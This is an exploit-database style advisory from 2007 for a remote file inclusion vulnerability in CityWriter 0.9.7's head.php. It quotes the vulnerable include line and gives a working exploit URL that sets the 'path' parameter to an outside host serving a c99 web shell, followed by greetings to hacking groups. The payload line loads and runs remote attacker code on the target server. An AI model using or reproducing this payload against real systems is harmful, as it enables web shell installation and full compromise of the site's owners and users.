CityWriter 0.9.7 head.php Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CityWriter 0.9.7 head.php Remote File Inclusion Vulnerability
# Published : 2007-12-13
# Author : RoMaNcYxHaCkEr
# Previous Title : PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability
# Next Title : CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability

# Name : CityWriter 0.9.7 Remote File Include
# Download From :
http://download.hulihanapplications.com/citywriter/citywriter-0.97.zip
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code In File head.php In Line 1:
<? include($path."topbar.php"); ?>
# Exploit :
Www.RxH.com/citywriter/head.php?path=http://www.no-hack.fr/shells/c99.txt?
============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , Dr- Wolf4ever And All My Friends
# For Contact : RxH@HotMail.iT
Best Wishes

# www.Syue.com [2007-12-13]